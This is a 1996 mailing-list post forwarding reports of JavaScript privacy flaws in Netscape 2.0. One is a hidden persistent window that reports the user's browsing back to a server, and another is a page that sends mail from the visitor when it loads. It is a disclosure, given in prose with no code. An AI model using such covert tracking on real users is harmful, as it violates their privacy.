IP: Java security ????

[Dave Farber <farber () central cis upenn edu>]

From: ethan miller <elm () cs umbc edu>




Apparently, someone has already figured out how to use the (supposed)
secure Java language to do spying.  This is important because it
doesn't rely on *any* bugs in Java; it merely takes advantage of a
design flaw (a Java script doesn't automatically get turned off when
you go to another page).


------- Forwarded Message


Date:    Thu, 22 Feb 1996 16:08:35 -0800
From:    Tom Phelps <phelps () CS Berkeley EDU>
To:      net.cool () ginsberg CS Berkeley EDU
Subject: JavaScript in Netscape 2.0 shouldn't let me do this, but it does


JavaScript in Netscape 2.0 shouldn't let me do this, but it does


John Robert LoVerso, OSF Research Institute 


After you've visited one of my pages, any of my JavaScript ought to
get scrubbed out of your browser's memory. You wouldn't want that code
to live on, snooping, spying, or stealing?


This is a simple example where I engage some JavaScript that runs in a
(mostly) hidden window.  This window persists, and hence, the
JavaScript I wrote persists. From then on, it wakes up every second
and sees what page you are viewing. If you've changed pages, it
reports where you now are back to me via a CGI, which saves
information like this:


(The rest at http://www.osf.org/~loverso/javascript/track-me.html)


AND


From: dmd () gradient cis upenn edu (Douglas DeCarlo)




In case you aren't aware of this yet, have you seen these privacy
problems which are in JavaScript in Netscape 2.0 (even after people
raised concerns in the beta versions)?


Such as a mailto upon loading a page (the page owners get mail from you
when you visit this page):
  http://www.popco.com/grabtest.html


Or even more intrusive, a script that reports what other pages you
visit (well, it does require another window, but the author claims it
can be hidden well):
  http://www.osf.org/~loverso/javascript/track-me.html


So much for private browsing..  :)


- Doug